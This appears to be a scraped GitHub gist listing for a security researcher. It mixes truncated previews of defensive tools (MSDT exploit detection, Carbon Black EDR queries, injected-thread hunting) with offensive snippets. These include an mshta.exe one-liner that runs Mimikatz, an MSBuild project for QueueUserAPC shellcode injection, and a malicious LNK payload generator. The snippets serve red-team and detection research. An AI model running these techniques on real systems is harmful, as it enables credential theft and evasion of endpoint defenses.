vector-sec / detection.yml
Created May 31, 2022 — forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
vector-sec /
Created Jul 2, 2021 — forked from rc-abodkins/
This script searches binaries within VMware Carbon Black EDR
import argparse
import os
import configparser
import csv
import sys
from os.path import exists
import requests
# Console output colouring: makes errors and warnings easier to spot in the output
err_Col = '\033[91m'
View gist:0f0e23961ed5eddfce60a9559683ea54
### Keybase proof
I hereby claim:
* I am vector-sec on github.
* I am vector_sec ( on keybase.
* I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611
To claim this, I am signing this object:
vector-sec / mimikatz.sct
Created Jan 18, 2018
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:").Exec(); log coffee exit"
<?XML version="1.0"?>
View Get-Doppelgangers.ps1
function Get-Doppelgangers
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953
Created Nov 28, 2017
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = ""
$hdrs = @{}
$response = Invoke-RestMethod -Uri $url -Headers $hdrs
for($i =0; $i -lt $response.total_results; $i++)
vector-sec / msbuildQueueAPC.csproj
Created Aug 30, 2017
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!-- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
vector-sec / Get-Token.ps1
Created Aug 10, 2017
PowerShell script to enumerate all Process and Thread tokens.
function Get-Token
foreach($proc in (Get-Process))
if($proc.Id -ne 0 -and $proc.Id -ne 4)
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
View Create-LNK.ps1
function Create-LNKPayload{
Generates a malicious LNK file
Name of the LNK file you want to create.
vector-sec / Get-InjectedThread.ps1
Created May 10, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
Looks for threads that were created as a result of code injection.